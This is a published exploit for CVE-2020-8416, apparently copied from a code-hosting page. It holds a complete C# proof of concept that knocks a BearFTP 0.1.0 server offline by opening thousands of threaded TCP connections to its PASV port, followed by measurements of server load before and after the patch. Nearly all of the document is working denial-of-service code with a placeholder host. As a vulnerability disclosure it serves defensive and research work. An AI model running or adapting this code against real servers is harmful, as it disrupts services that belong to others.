43 lines
No EOL
1.8 KiB
C#
43 lines
No EOL
1.8 KiB
C#
# Exploit Title: BearFTP 0.1.0 - 'PASV' Denial of Service
|
|
# Date: 2020-01-29
|
|
# Exploit Author: kolya5544
|
|
# Vendor Homepage: http://iktm.me/
|
|
# Software Link: https://github.com/kolya5544/BearFTP/releases
|
|
# Version: v0.0.1 - v0.1.0
|
|
# Tested on: Ubuntu 18.04
|
|
# CVE : CVE-2020-8416
|
|
|
|
static void Main(string[] args)
|
|
{
|
|
Console.WriteLine("DoS started. Approx. time to complete: 204 seconds.");
|
|
for (int i = 0; i < 1024*8; i++) // We will do 8000+ connections. Usually server only spawns half of them.
|
|
{
|
|
new Thread(() =>
|
|
{
|
|
Thread.CurrentThread.IsBackground = true;
|
|
|
|
TcpClient exploit = new TcpClient("HOSTNAME", PASV_PORT); //Replace with actual data to test it.
|
|
var ns = exploit.GetStream();
|
|
StreamWriter sw = new StreamWriter(ns);
|
|
sw.AutoFlush = true;
|
|
StreamReader sr = new StreamReader(ns);
|
|
|
|
|
|
while (true)
|
|
{
|
|
Thread.Sleep(5000); //We just spend our time.
|
|
}
|
|
}).Start();
|
|
Thread.Sleep(25); //Spawn a new connection every 25ms so we don't kill our own connection.
|
|
}
|
|
while (true)
|
|
{
|
|
Console.WriteLine("DoS attack completed!");
|
|
Thread.Sleep(20000);
|
|
}
|
|
}
|
|
/*
|
|
BEFORE PATCH APPLIED (after ~100 seconds of attacking):
|
|
3700 threads spawned, VIRT went from 3388M to 32.1G, RES from 60000 to 129M. CPU usage ~10%. The server struggles to process commands. Recovers in several minutes after the attack is stopped
|
|
AFTER PATCH APPLIED:
|
|
10 threads spawned at most, VIRT didnt change, RES didnt change. CPU usage ~3%. Works fine. */ |